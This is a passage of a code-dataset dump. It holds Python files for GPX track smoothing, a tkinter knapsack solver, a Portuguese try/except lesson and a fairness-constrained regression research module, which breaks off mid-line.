return_dict[5] = lonsmooth\n return_dict[6] = elesmooth\n\n\n\ndef runsmoothengpx(args) :\n manager = mp.Manager()\n return_dict = manager.dict()\n if len(args) == 1 :\n args = args + (2,)\n args = args + (return_dict,)\n proc=mp.Process(target=smoothengpx,args=args)\n #proc.daemon=True\n proc.start()\n proc.join()\n return return_dict.values()[0],return_dict.values()[1],return_dict.values()[2],return_dict.values()[3],return_dict.values()[4],return_dict.values()[5],return_dict.values()[6]\n\n \n\ndef writeoutput(filename,gpx) :\n print('File created: {}'.format(filename))\n with open(filename, 'w') as file :\n file.write(gpx)\n\n\ndef main(filename,algo=2):\n gpxsmooth,lat,lon,ele,latsmooth,lonsmooth,elesmooth = smoothengpxfilename(filename,algo)\n newfilename = filename.replace('.gpx','_smooth.gpx')\n writeoutput(newfilename,gpxsmooth)\n return gpxsmooth,lat,lon,ele,latsmooth,lonsmooth,elesmooth\n\n\nif __name__ == \"__main__\":\n\n filename = sys.argv[1]\n\n if len(sys.argv) > 1 :\n algo = 2\n if len(sys.argv) > 2 :\n algo = sys.argv[2]\n\n main(filename, algo)\n\n\n","repo_name":"jonderwaater/smoothify","sub_path":"smoothify/smoothen.py","file_name":"smoothen.py","file_ext":"py","file_size_in_byte":6040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37631202860","text":" \n\"\"\" KNAPSACK SOLVER \"\"\"\nfrom tkinter import Menu, Button, StringVar, OptionMenu, messagebox as msg, filedialog, Tk\nfrom file_parser import fileparser\nfrom greedy import greedy\nfrom item import value, Item, density, weightInverse\ndef helpmenu():\n \"\"\" help menu \"\"\"\n msg.showinfo(\"Help\", \"A knapsack Problem solver\")\n\ndef aboutmenu():\n \"\"\" about menu \"\"\"\n msg.showinfo(\"About\", \"Version 1.0\")\n\nclass KnapsackSolver():\n \"\"\" KNAPSACK SOLVER CLASS \"\"\"\n def __init__(self, master):\n self.master = master\n self.master.title(\"KNAPSACK_SOLVER\")\n self.master.geometry(\"250x120\")\n self.master.resizable(False, False)\n self.filed = \"\"\n self.solution = {}\n self.listofitems = []\n #menu\n self.menu = Menu(self.master)\n self.file_menu = Menu(self.menu, tearoff=0)\n self.file_menu.add_command(label=\"Insert a file\",\n accelerator='Ctrl+O', command=self.insertfile)\n self.file_menu.add_command(label=\"Solve\", accelerator='Alt+F5', command=self.solve)\n self.file_menu.add_command(label=\"Save Solution\", accelerator='Ctrl+S', command=self.save_solution)\n self.file_menu.add_command(label=\"Close file\", accelerator=\"Ctrl+F5\", command=self.cf)\n self.file_menu.add_command(label=\"Exit\", accelerator='Alt+F4', command=self.exitmenu)\n self.menu.add_cascade(label=\"File\", menu=self.file_menu)\n self.show_menu = Menu(self.menu, tearoff=0)\n self.show_menu.add_command(label=\"Show Solution\", accelerator='Ctrl+F4',\n command=self.show_solution)\n self.menu.add_cascade(label=\"Show\", menu=self.show_menu)\n self.about_menu = Menu(self.menu, tearoff=0)\n self.about_menu.add_command(label=\"About\", accelerator='Ctrl+I', command=aboutmenu)\n self.menu.add_cascade(label=\"About\", menu=self.about_menu)\n self.help_menu = Menu(self.menu, tearoff=0)\n self.help_menu.add_command(label=\"Help\", accelerator='Ctrl+F1', command=helpmenu)\n self.menu.add_cascade(label=\"Help\", menu=self.help_menu)\n self.master.config(menu=self.menu)\n self.master.bind('', lambda event: self.show_solution())\n self.master.bind('', lambda event: self.insertfile())\n self.master.bind('', lambda event: self.solve())\n self.master.bind('', lambda event: self.exitmenu())\n self.master.bind('', lambda event: self.cf())\n self.master.bind('', lambda event: helpmenu())\n self.master.bind('', lambda event: aboutmenu())\n\n self.binsert = Button(self.master, text=\"Insert a file\", command=self.insertfile)\n self.binsert.pack()\n\n setslist = list([\"WeightInverse\", \"Density\", \"Value\"])\n self.varnumset = StringVar(master)\n self.varnumset.set(setslist[0])\n self.popupsetmenu = OptionMenu(self.master, self.varnumset, *setslist)\n self.popupsetmenu.pack()\n \n \n def cf(self):\n \"\"\" closes the .txt file \"\"\"\n if self.filed == \"\":\n msg.showerror(\"ERROR\", \"NO FILE IMPORTED TO CLOSE\")\n else:\n self.filed = \"\"\n self.listofitems = []\n self.solution = {}\n self.solvb.forget()\n msg.showinfo(\"SUCCESS\", \"FILE CLOSED\")\n def file_verification_gui(self):\n \"\"\" inserted gui after verification \"\"\"\n self.solvb = Button(self.master, text=\"Solve\", command=self.solve)\n self.solvb.pack()\n\n def file_verification(self):\n \"\"\" verifies that the inserted file is a knapsack problem instance \"\"\"\n if \".txt\" in self.filed:\n try:\n self.solution = {}\n self.solvb = Button(self.master, text=\"Solve\", command=self.solve)\n self.solvb.pack()\n self.nofi, self.maxW, self.item, self.weight = fileparser(self.filed)\n for i in range(len(self.item)):\n self.listofitems.append(Item(str(self.item[i]),\n float(self.item[i]),\n float(self.weight[i])))\n msg.showinfo(\"SUCCESS\",\n \"THE FILE SUCCESSFULLY INSERTED \")\n except ValueError:\n msg.showerror(\"ERROR\", \"NO KNAPSACK PROBLEM INSTANCE INSERTED\")\n self.filed = \"\"\n self.listofitems = []\n self.solution = {}\n self.solvb.forget()\n else:\n msg.showerror(\"Error\", \"NO TXT FILE ADDED\")\n\n def insertfile(self):\n \"\"\" user inserts a .txt file (problem instance ) \"\"\"\n if self.filed == \"\":\n self.filed = filedialog.askopenfilename(initialdir=\"/\", title=\"Select txt file\",\n filetypes=((\"txt files\", \"*.txt\"),\n (\"all files\", \"*.*\")))\n self.file_verification()\n else:\n msg.showerror(\"ERROR\", \"YOU NEED TO CLOSE THE FILE\")\n \n def show_solution(self):\n \"\"\" Shows info about the solution\"\"\"\n if self.solution == {}:\n msg.showerror(\"Error\", \"THERE IS NO AVAILABLE SOLUTION.\\n USE THE SOLVE BUTTON\")\n else:\n msg.showinfo(\"Solution\",\n \"Value:\"+ str(self.solution.get(\"Value\")) +\n \"Items\"+ str(self.solution.get(\"Items\")))\n \n def save_solution(self):\n if self.solution == {}:\n msg.showerror(\"Error\", \"THERE IS NO AVAILABLE SOLUTION.\\n USE THE SOLVE BUTTON\")\n else:\n with open(\"sol\"+str(self.filed.split(\"/\")[-1]), 'w') as f:\n f.write(str(self.solution))\n\n def solve(self):\n \"\"\" sholves the problem\"\"\"\n if self.filed == \"\":\n msg.showerror(\"ERROR\", \"NO KNAPSACK PROBLEM INSTANCE INSERTED\")\n else:\n if self.varnumset.get() == \"Value\":\n result, totalvalue = greedy(self.listofitems, int(self.maxW), value)\n elif self.varnumset.get() == \"Density\":\n result, totalvalue = greedy(self.listofitems, int(self.maxW), density)\n else:\n result, totalvalue = greedy(self.listofitems, int(self.maxW), weightInverse)\n self.solution.update({\"Value\":totalvalue, \"Items\":str([i.getName() for i in result])})\n msg.showinfo(\"Solution:\",\n \"Value:\"+str(totalvalue)+\n \"\\n Items:\"+str([i.getName() for i in result]))\n def exitmenu(self):\n \"\"\" exit \"\"\"\n if msg.askokcancel(\"Quit?\", \"Really quit?\"):\n self.master.destroy()\n \n\ndef main():\n \"\"\" main function \"\"\"\n root = Tk()\n KnapsackSolver(root)\n root.mainloop()\nif __name__ == '__main__':\n main()\n","repo_name":"kostaskaragiorgos/Knapsack-Problem","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":6912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22397237808","text":"\"\"\"\nNessa aula, vamos ver como o Python permite tratar erros e criar respostas a essas exceções.\nAprenda como usar a estrutura try except no Python de uma forma simples.\n\"\"\"\n\n\"\"\"\n--> Estrutura padrão:\n\ntry:\n Operação\nexcept:\n Falhou\nelse:\n Deu certo\nfinally:\n Certo/Falha (Vai aparecer de qualquer forma.)\n\n\"\"\"\n# --> Exemplo pratico <--\n\ntry:\n a = int(input('Numero: '))\n b = int(input('Numero: '))\n r = a / b\nexcept Exception as erro:\n print('Ops... Algo deu errado :(')\n print(f'O problema foi: {erro.__class__}')\nexcept (ValueError, TypeError):\n print('Tivemos um problema com o tipo de dado que voce digitou.')\nexcept ZeroDivisionError:\n print('Não e possível dividir um número por ZERO.')\nelse:\n print(f'O resultado e {r:.1f}')\nfinally:\n print('Volte Sempre!')\n","repo_name":"Joao-Vrosa/CursoEmVideo-Python","sub_path":"Modulo-3_CursoEmVideo/Tratamento_de_erros/Tratamento_de_erros.py","file_name":"Tratamento_de_erros.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16270335010","text":"# -*- coding: utf-8 -*-\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport scipy.stats\r\nimport time\r\nfrom scipy import sparse\r\nimport datetime\r\nimport sys\r\nimport os\r\nimport copy\r\nimport itertools\r\nfrom sklearn import svm\r\nfrom sklearn import tree\r\nfrom sklearn import ensemble\r\nfrom sklearn import linear_model\r\nfrom sklearn import metrics\r\nfrom sklearn import model_selection\r\nfrom sklearn import preprocessing\r\nfrom sklearn import neural_network\r\nfrom sklearn import gaussian_process\r\nfrom sklearn import kernel_approximation\r\nfrom sklearn import kernel_ridge\r\nfrom scipy import stats\r\n#from fastFM import als, sgd, mcmc\r\nimport pandas as pd\r\n#from statsmodels.discrete import discrete_model\r\nimport math\r\nimport random\r\n\r\n#result class\r\nclass Result:\r\n def __init__(self, Y, Yhat, S, avails):\r\n self.md = self.getMD(Yhat, S, avails)\r\n self.corr = self.getCorr(Yhat, S)\r\n self.auc = self.getAUC(Yhat, S, avails)\r\n self.rmse = self.getRMSE(Y, Yhat)\r\n def elems(self):\r\n return self.md,self.corr,self.auc,self.rmse\r\n def __str__(self):\r\n return \"Result: md=\"+str(self.md)+\" corr=\"+str(self.corr)+\" auc=\"+str(self.auc)+\" rmse=\"+str(self.rmse)\r\n def getMD(self, Yhat, S, avails):\r\n if len(Yhat) != len(S):\r\n print (\"Error: len(Yhat) != len(S)\");sys.exit()\r\n d_s = len(S[0]) #num of sensitive features\r\n l = len(Yhat)\r\n mds = []\r\n for j in range(d_s):\r\n srange = set([S[i,j] for i in range(l)])\r\n if avails[j]:\r\n Y1 = [Yhat[i] for i in range(l) if S[i,j]==1]\r\n Y0 = [Yhat[i] for i in range(l) if S[i,j]==0]\r\n md = abs(np.mean(Y1)-np.mean(Y0))\r\n mds.append(md)\r\n else:\r\n mds.append(False)\r\n return mds\r\n def getCorr(self, Yhat, S):\r\n if len(Yhat) != len(S):\r\n print (\"Error: len(Yhat) != len(S)\");sys.exit()\r\n d_s = len(S[0]) #num of sensitive features\r\n l = len(S)\r\n corrs = []\r\n for j in range(d_s):\r\n corr = abs( np.corrcoef(Yhat, S[:,j])[0,1] ) #mdというか相関\r\n corrs.append(corr)\r\n return corrs\r\n def getAUC(self, Yhat, S, avails):\r\n if len(Yhat) != len(S):\r\n print (\"Error: len(Yhat) != len(S)\");sys.exit()\r\n d_s = len(S[0]) #num of sensitive features\r\n l = len(Yhat)\r\n aucs = []\r\n for j in range(d_s):\r\n srange = set([S[i,j] for i in range(l)])\r\n #print \"srange=\",srange\r\n if avails[j]:\r\n Y1 = [Yhat[i] for i in range(l) if S[i,j]==1]\r\n Y0 = [Yhat[i] for i in range(l) if S[i,j]==0]\r\n if len(Y1)*len(Y0)==0:\r\n auc = 0\r\n else:\r\n count = 0\r\n #slow (O(N^2)...)\r\n for y1i in Y1:\r\n for y0j in Y0:\r\n if y1i>y0j:\r\n count+=1\r\n auc = count/float(len(Y1)*len(Y0))\r\n aucs.append(auc)\r\n else:\r\n aucs.append(False)\r\n return aucs\r\n def getRMSE(self, Y, Yhat):\r\n if len(Yhat) != len(Y):\r\n print (\"Error: len(Yhat) != len(S)\");sys.exit()\r\n return np.mean([(Y[i]-Yhat[i])**2 for i in range(len(Y))])**0.5\r\n\r\n#merges several Result classes\r\nclass ResultRep:\r\n def __init__(self):\r\n self.results, self.runnames = [], []\r\n def add_run(self, runname, result):\r\n self.results.append(result)\r\n self.runnames.append(runname)\r\n def merge(self, resultRep):\r\n for i in range(len(resultRep.results)):\r\n result, runname = resultRep.results[i], resultRep.runnames[i]\r\n self.results.append(result)\r\n self.runnames.append(runname)\r\n def __str__(self):\r\n strs = []\r\n for i,_ in enumerate(self.results):\r\n strs.append(\"Title:\"+str(self.runnames[i])+\" \"+str(self.results[i]))\r\n return \"\\n\".join(strs)\r\n def str_pretty(self):\r\n astr = \"\"\r\n md_avgs, corr_avgs, auc_avgs, rmse_avg = {}, {}, {}, {}\r\n for i,_ in enumerate(self.results):\r\n run = self.runnames[i]\r\n conf = copy.deepcopy(self.runnames[i])\r\n conf.pop('run', None)\r\n conf = str(conf) #for using conf as a key \r\n #print (\"conf=\",conf)\r\n if not conf in md_avgs:\r\n md_avgs[conf], corr_avgs[conf], auc_avgs[conf], rmse_avg[conf] = [], [], [], []\r\n result = self.results[i]\r\n md_avgs[conf].append(result.md)\r\n corr_avgs[conf].append(result.corr)\r\n auc_avgs[conf].append(result.auc)\r\n rmse_avg[conf].append(result.rmse)\r\n for conf in md_avgs.keys():\r\n l = len(md_avgs[conf][0])\r\n mds = [np.mean([md_avgs[conf][i][j] for i in range(len(md_avgs[conf]))]) for j in range(l)]\r\n corrs = [np.mean([corr_avgs[conf][i][j] for i in range(len(md_avgs[conf]))]) for j in range(l)]\r\n aucs = [np.mean([auc_avgs[conf][i][j] for i in range(len(md_avgs[conf]))]) for j in range(l)]\r\n rmse = np.mean(rmse_avg[conf])\r\n astr += \"###Result:\"+str(conf) + \" md=\" + str(mds) + \" corr=\" + str(corrs) + \" auc=\" + str(aucs) + \" rmse=\" + str(rmse) + \"\\n\"\r\n #strs.append(\"Title:\"+self.runnames[i]+\" \"+str(self.results[i]))\r\n return astr\r\n\r\nclass Dataset:\r\n def __init__(self, S, X1, X2, y):\r\n self.has_validdata = False\r\n self.has_testdata = False\r\n self.fstStageRegressor = linear_model.Ridge(fit_intercept=True)\r\n self.trainS, self.trainX1, self.trainX2, self.trainY = S, X1, X2, y\r\n def set_traindata(self, S, X1, X2, y):\r\n self.trainS, self.trainX1, self.trainX2, self.trainY = S, X1, X2, y\r\n def add_validdata(self, S, X1, X2, y):\r\n self.validS, self.validX1, self.validX2, self.validY = S, X1, X2, y\r\n self.has_validdata = True\r\n def add_testdata(self, S, X1, X2, y):\r\n self.testS, self.testX1, self.testX2, self.testY = S, X1, X2, y\r\n self.has_testdata = True\r\n def getValidationData(self):\r\n if self.has_validdata:\r\n return copy.deepcopy((self.validS, self.validX1, self.validX2, self.validY))\r\n else:\r\n print (\"Error: validation data not found\");sys.exit(0)\r\n def getPredictData(self):\r\n if self.has_testdata:\r\n return copy.deepcopy((self.testS, self.testX1, self.testX2, self.testY))\r\n else:\r\n print (\"Error: test data not found\");sys.exit(0)\r\n return copy.deepcopy((self.trainS, self.trainX1, self.trainX2, self.trainY))\r\n def Unfair_Prediction_Noarg(self, lmd):\r\n X = np.c_[self.trainX1, self.trainX2]\r\n lr = linear_model.Ridge(alpha=lmd, fit_intercept=True)\r\n lr.fit( X, self.trainY )\r\n #validS, validX1, validX2, validY = self.getValidationData()\r\n testS, testX1, testX2, testY = self.getPredictData()\r\n predictX_train = np.c_[self.trainX1, self.trainX2] #use X1, S, and X2\r\n #predictX_valid = np.c_[validX1, validX2] #use X1, S, and X2\r\n predictX_test = np.c_[testX1, testX2] #use X1, S, and X2\r\n yhat_train = lr.predict(predictX_train).flatten()\r\n #yhat_valid = lr.predict(predictX_valid).flatten()\r\n yhat_test = lr.predict(predictX_test).flatten()\r\n y_pred_error_unfair = testY - yhat_test\r\n print (\"genvar=\",np.mean([(testY[i])**2 for i in range(len(testY))])**0.5)\r\n #print \"unfair genavg=\",np.mean([(testY[i]-yhat_test[i])**2 for i in range(len(testY))])**0.5\r\n return yhat_test, np.mean([y_pred_error_unfair**2 for i in range(len(testY))])**0.5\r\n def Unfair_Prediction(self, kernel, lmd, gamma, avails, use_S = False):\r\n if use_S:\r\n X = np.c_[self.trainX1, self.trainS]\r\n else:\r\n X = self.trainX1\r\n if not kernel: #linear\r\n lr = linear_model.Ridge(alpha=lmd, fit_intercept=True)\r\n #lr = linear_model.LinearRegression(fit_intercept=True)\r\n else:\r\n lr = kernel_ridge.KernelRidge(alpha=lmd, kernel=\"rbf\", gamma=gamma)\r\n lr.fit( X, self.trainY )\r\n validS, validX1, validX2, validY = self.getValidationData()\r\n testS, testX1, testX2, testY = self.getPredictData()\r\n if use_S:\r\n predictX_train = np.c_[self.trainX1, self.trainS] \r\n predictX_valid = np.c_[validX1, validS] \r\n predictX_test = np.c_[testX1, testS] \r\n else:\r\n predictX_train = self.trainX1\r\n predictX_valid = validX1 \r\n predictX_test = testX1\r\n yhat_train = lr.predict(predictX_train).flatten()\r\n yhat_valid = lr.predict(predictX_valid).flatten()\r\n yhat_test = lr.predict(predictX_test).flatten()\r\n #print (\"genvar=\",np.mean([(testY[i])**2 for i in range(len(testY))])**0.5)\r\n #print (\"unfair genavg=\",np.mean([(testY[i]-yhat_test[i])**2 for i in range(len(testY))])**0.5)\r\n return Result(self.trainY, yhat_train, self.trainS, avails), Result(validY, yhat_valid, validS, avails), Result(testY, yhat_test, testS, avails)\r\n def train_X1_resid(self, trainX1, trainS_X2, trainS, lr1, use_X2=True):\r\n X1_size = len(trainX1[0])\r\n NumData = len(trainX1)\r\n trainS_X2_resX1 = trainS_X2\r\n #self.stddevs = []\r\n for i in range(X1_size): #train models\r\n #print \"train\",i,trainS_X2_resX1.shape\r\n if use_X2:\r\n X1i = np.array([x[i] for x in trainX1])\r\n lr1[i].fit(trainS_X2_resX1, X1i)\r\n resid = X1i - lr1[i].predict(trainS_X2_resX1)\r\n else:\r\n X1i = np.array([x[i] for x in trainX1])\r\n lr1[i].fit(trainS, X1i)\r\n resid = X1i - lr1[i].predict(trainS)\r\n #stddevS1 = np.std([resid[j] for j in range(NumData) if trainS[j][0]==1])\r\n #stddevS0 = np.std([resid[j] for j in range(NumData) if trainS[j][0]==0])\r\n #if stddevS1*stddevS0 <= 0: #cannot correct variance\r\n # print \"error: var0 attr,i\",i;sys.exit(0)\r\n #self.stddevs.append([stddevS1, stddevS0])\r\n def get_X1_resid(self, lrs, X1, S, S_X2, use_X2=True): #note that lrs are classifiers/regressors\r\n X1_size = len(X1[0])\r\n NumData = len(X1)\r\n #print \"X1size,NumData=\",X1_size,NumData,X1.shape\r\n X1_resid_tmp = []\r\n S_X2_resX1 = S_X2\r\n for i in range(X1_size):\r\n if use_X2:\r\n X1_resid_tmp.append( X1[:,i] - lrs[i].predict(S_X2_resX1) )\r\n else:\r\n X1_resid_tmp.append( X1[:,i] - lrs[i].predict(S) )\r\n #print \"correcting variance heteroscadecity\"\r\n #stddevS1, stddevS0 = self.stddevs[i]\r\n #stddev = np.std(X1_resid_tmp[i])\r\n #for j in range(NumData):\r\n # X1_resid_tmp[i][j] /= stddev\r\n #if S[j][0]==1:\r\n # X1_resid_tmp[i][j] /= stddevS1\r\n #else:\r\n # X1_resid_tmp[i][j] /= stddevS0\r\n X1_resid = np.array([[X1_resid_tmp[i][j] for i in range(X1_size)] for j in range(NumData)])\r\n return X1_resid\r\n def save(self, S, X1, X2, Y, filename): #obsolate\r\n fo = file(filename, \"w\")\r\n fo.write(\"#\"+str(S.shape[1])+\",\"+str(X1.shape[1])+\",\"+str(X2.shape[1])+\",\"+str(1)+\"\\n\") #header\r\n for i in xrange(len(Y)): #main\r\n fo.write(\\\r\n \",\".join([str(S[i,j]) for j in range(max(1,S.shape[1]))])+\",\"+\\\r\n \",\".join([str(X1[i,j]) for j in range(X1.shape[1])])+\",\"+\\\r\n \",\".join([str(X2[i,j]) for j in range(max(1,X2.shape[1]))])+\",\"\\\r\n +str(Y[i])+\"\\n\")\r\n fo.close()\r\n def seeResidMean(self, x, S): #see whether E[x|S=1]=E[x|S=0]\r\n print (\"E[x|S=1]=\",np.mean([x[i] for i in range(len(x)) if S[i]==1]),\"E[x|S=0]=\",np.mean([x[i] for i in range(len(x)) if S[i]==0]),\"E[x]=\",np.mean([x[i] for i in range(len(x))]))\r\n print (\"stddev[x|S=1]=\",np.std([x[i] for i in range(len(x)) if S[i]==1]),\"stddev[x|S=0]=\",np.std([x[i] for i in range(len(x)) if S[i]==0]),\"stddev[x]=\",np.std([x[i] for i in range(len(x))]))\r\n def Fair_Prediction_Optimization(self, eps, lmd_n, Vs, Vx, vs, vx):\r\n #calculate alpha, beta as an optimization problem\r\n # min a.T Vx a + b.T Vy b - a.T E[sy] - b.t E[xy]\r\n # s.t. (1-eps)a.T Vs a - eps b.T Vx b\r\n import fairopt\r\n if not (0<=eps<=1):\r\n print (\"Error: eps must be in [0,1]\");sys.exit(0)\r\n #def solveCQP(Q, q, c, epsVal): \r\n # #Solve 1QCQP whose objective function is convex.\r\n # #min x'*setQ{1}*x+2*setq{1}'*x+setc{1}\r\n # #s.t. x'*setQ{2}*x+2*setq{2}'*x+setc{2} <= 0\r\n ds,dx = len(vs),len(vx)\r\n Q = [[],[]]\r\n Q[0] = np.zeros((ds+dx, ds+dx))\r\n Q[0][:ds,:ds] = Vs\r\n Q[0][ds:ds+dx,ds:ds+dx] = Vx[:dx,:dx]\r\n Q[0] += lmd_n * np.identity(ds+dx)\r\n# print \"eps,lmd_n,Q=\",eps,lmd_n,Q\r\n Q[1] = np.zeros((ds+dx, ds+dx))\r\n Q[1][:ds,:ds] = (1-eps)*Vs\r\n Q[1][ds:ds+dx,ds:ds+dx] = -eps*Vx[:dx,:dx]\r\n q = [[], []]\r\n q[0] = np.concatenate((-vs,-vx)).reshape(-1,1)[:ds+dx,:]\r\n q[1] = np.zeros((ds+dx,1))\r\n c = np.array([0,0])\r\n np.set_printoptions(threshold='nan')\r\n sol_cqp, val_cqp = fairopt.solveCQP( Q, q, c, eps, core = 2 )\r\n# print \"sol=\",sol_cqp\r\n return sol_cqp\r\n #sol, val, valfst = fairopt.qcqpSDP_mosek( Q, q, c )\r\n #return sol.flatten()\r\n def Fair_Prediction_Optimization_Correlated(self, eps, S, X, vs, vx):\r\n #calculate alpha, beta as an optimization problem\r\n # min a.T Vx a + b.T Vy b - a.T E[sy] - b.t E[xy]\r\n # s.t. (1-eps)a.T Vs a - eps b.T Vx b\r\n import fairopt\r\n if not (0<=eps<=1):\r\n print (\"Error: eps must be in [0,1]\");sys.exit(0)\r\n Vs = np.array(np.cov(S.T)).reshape((1,-1))\r\n Vsx = np.matmul(S.T,X)/len(S)\r\n #xxxxs = np.matmul(X, np.matmul(np.matmul(np.linalg.inv(np.matmul(X.T, X)), X.T),S))\r\n #VsD = np.array(np.cov((S-xxxxs).T)).reshape((1,-1))\r\n Vx = np.cov(X.T)\r\n #print \"Vs,Vx,Vsx norm=\",np.linalg.norm(Vs),np.linalg.norm(Vx),np.linalg.norm(Vsx)\r\n #print vs.shape,vx.shape\r\n ds,dx = len(vs),len(vx)\r\n Q = [[],[]]\r\n Q[0] = np.zeros((ds+dx, ds+dx))\r\n Q[0][:ds,:ds] = Vs\r\n Q[0][ds:ds+dx,ds:ds+dx] = Vx\r\n Q[0][:ds,ds:] = Vsx\r\n Q[0][ds:,:ds] = Vsx.T\r\n #print \"Q[0] svd =\",np.linalg.svd(Q[0])[1]\r\n Q[1] = np.zeros((ds+dx, ds+dx))\r\n Q[1][:ds,:ds] -= eps*Vs\r\n Q[1][:ds,:ds] += Vs\r\n Q[1][:ds,ds:] += (0.5-eps)*Vsx\r\n Q[1][ds:,:ds] += (0.5-eps)*Vsx.T\r\n Q[1][ds:ds+dx,ds:ds+dx] -= eps*Vx[:dx,:dx]\r\n q = [[], []]\r\n q[0] = np.concatenate((-vs,-vx)).reshape(-1,1)[:ds+dx,:]\r\n q[1] = np.zeros((ds+dx,1))\r\n c = np.array([0,0])\r\n np.set_printoptions(threshold='nan')\r\n sol_cqp, val_cqp = fairopt.solveCQP( Q, q, c, eps, core=2 )\r\n return sol_cqp \r\n def Fair_Prediction_Kernel_Optimization(self, eps, lmd, Ks, Kx, S, X, Y):\r\n #kernel version (optimization)\r\n import fairopt\r\n if not (0<=eps<=1):\r\n print (\"Error: eps must be in [0,1]\");sys.exit(0)\r\n Q = [[],[]]\r\n q = [[],[]]\r\n n = len(Y)\r\n Q[0] = np.zeros((2*n, 2*n))\r\n Q[1] = np.zeros((2*n, 2*n))\r\n q[0] = np.zeros((2*n, 1))\r\n q[1] = np.zeros((2*n, 1))\r\n c = np.array([0,0])\r\n #print \"preparing data\";sys.stdout.flush()\r\n Ks2, Kx2 = np.matmul(Ks,Ks), np.matmul(Kx,Kx)\r\n In = np.eye(n, n)\r\n #print \"Ks2,Kx2 norm=\",np.linalg.norm(Ks2),np.linalg.norm(Kx2)\r\n #print \"matrix prepared\";sys.stdout.flush()\r\n for i in range(n):\r\n for j in range(n):\r\n q[0][j] -= Y[i] * Ks[i,j]\r\n q[0][j+n] -= Y[i] * Kx[i,j]\r\n Q[0][i,j] += Ks2[i,j]\r\n Q[0][i+n,j+n] += Kx2[i,j]\r\n Q[0][i,j] += lmd * Ks[i,j] #Ks[i,j]\r\n Q[0][i+n,j+n] += lmd * Kx[i,j]\r\n for i in range(n):\r\n for j in range(n):\r\n Q[1][i,j] += (1.0 - eps) * (Ks2[i,j] + lmd * Ks[i,j]) #note: lambda * In (for making Q PSD)\r\n Q[1][i+n,j+n] += - eps * (Kx2[i,j] + lmd * Kx[i,j])\r\n def mysvd(A): #note: np.svd sometimes fails\r\n try:\r\n X, Y, Z = np.linalg.svd(A)\r\n except:\r\n try:\r\n A2 = np.dot(A.T, A)\r\n X2, Y2, Z = np.linalg.svd(A2)\r\n Y = np.sqrt(Y2)\r\n X = np.dot(A, Z.T); X = np.dot(X, np.linalg.inv(np.diag(Y)))\r\n except:\r\n try:\r\n print (\"svd try2\")\r\n w,v = np.linalg.eigh(np.dot(A.T ,A))\r\n w = w[::-1]; v = v[:,::-1]\r\n Y = np.sqrt(w)\r\n X = np.dot(A,v); X = np.dot(X,np.diag(Y**(-1))); Z = v.T\r\n except:\r\n try:\r\n print (\"svd try3\")\r\n n = A.shape[0]\r\n Ad = A + np.identity(n)*0.01\r\n A2 = np.dot(Ad.T, Ad)\r\n X2, Y2, Z = np.linalg.svd(A2)\r\n Y = np.sqrt(Y2)\r\n X = np.dot(Ad, Z.T); X = np.dot(X, np.linalg.inv(np.diag(Y)))\r\n except:\r\n print (\"svd try4\")\r\n n = A.shape[0]\r\n Ad = A + np.identity(n)*0.1\r\n A2 = np.dot(Ad.T, Ad)\r\n X2, Y2, Z = np.linalg.svd(A2)\r\n Y = np.sqrt(Y2)\r\n X = np.dot(Ad, Z.T); X = np.dot(X, np.linalg.inv(np.diag(Y)))\r\n return X,Y,Z\r\n print (\"calling optimizer\");sys.stdout.flush()\r\n try:\r\n sol, val_cqp = fairopt.solveCQP( Q, q, c, eps )\r\n except:\r\n print (\"Warning: cqp failed. trying SDP\")\r\n sol, val_sdp, val_sdp_fst = fairopt.qcqpSDP_mosek( Q, q, c )\r\n sol = sol.flatten()\r\n return sol\r\n def subsample_from_levscore(self, ks, kx, S, X, gamma, p_ratio, ratio):\r\n import leveragescore\r\n n = X.shape[0]\r\n p = int(n*p_ratio)\r\n p_ids = np.random.choice(range(n), p, False)\r\n C = np.zeros((n, p))\r\n W = np.zeros((p, p))\r\n for i in range(n):\r\n for j in range(p):\r\n C[i,j] = kx(X[i], X[p_ids[j]])\r\n for i in range(p):\r\n for j in range(p):\r\n W[i,j] = kx(X[p_ids[i]], X[p_ids[j]])\r\n W = W + 0.01 * np.identity(p) #for numerical stability\r\n B = np.matmul(C, np.linalg.pinv(np.linalg.cholesky(W)))\r\n lmd = gamma/2.0\r\n BtBpNlI_inv = np.linalg.inv(np.matmul(B.T,B)+n*lmd*np.identity(p))\r\n lx = []\r\n for i in range(n):\r\n l = np.matmul(np.matmul(B[i,:].T, BtBpNlI_inv),B[i,:])\r\n lx.append(l)\r\n #ls = leveragescore.leverage_score(Ks, gamma/2.0)\r\n #lx = leveragescore.leverage_score(Kx, gamma/2.0)\r\n dx_eff = sum(lx)\r\n return np.random.choice(range(n), int(n*ratio), False, lx/dx_eff)\r\n def EpsFair_Prediction(self, filename, eps, hparams, avails, p):\r\n is_kernel = p.kernel\r\n rff = p.rff\r\n lmd = hparams[\"lmd\"]\r\n gamma = hparams[\"gamma\"]\r\n if is_kernel and rff:\r\n print (\"Error: either rff or kernel needs to be false\");sys.exit()\r\n\r\n NTrain = len(self.trainX1)\r\n transform_s = p.nonlinears\r\n trainS, trainX1 = copy.deepcopy(self.trainS), copy.deepcopy(self.trainX1)\r\n\r\n if rff:\r\n if not transform_s:\r\n print (\"random fourier feature\")\r\n else:\r\n print (\"random fourier feature (full ns)\")\r\n ds_new = len(self.trainS[0])*10 \r\n dx_new = len(self.trainX1[0])*10 \r\n sys.stdout.flush()\r\n if transform_s:\r\n sampler_s = kernel_approximation.RBFSampler(gamma = hparams[\"gamma\"], n_components = ds_new)\r\n sampler_s.fit(trainS)\r\n trainS = sampler_s.transform(trainS)\r\n sampler_x = kernel_approximation.RBFSampler(gamma = hparams[\"gamma\"], n_components = dx_new)\r\n sampler_x.fit(self.trainX1)\r\n trainX1 = sampler_x.transform(self.trainX1)\r\n else:\r\n trainX1 = self.trainX1\r\n S_std = [np.std(trainS[:,j]) for j in range(len(trainS[0]))]\r\n for j in range(len(trainS[0])):\r\n trainS[:,j] = trainS[:,j] / S_std[j]\r\n X1_size = len(trainX1[0])\r\n lr1 = [] #stage1 regressor/classifiers\r\n for i in range(X1_size):\r\n lr1.append(copy.deepcopy(self.fstStageRegressor))\r\n lr1[-1].set_params(alpha = lmd)\r\n trainS_X2 = 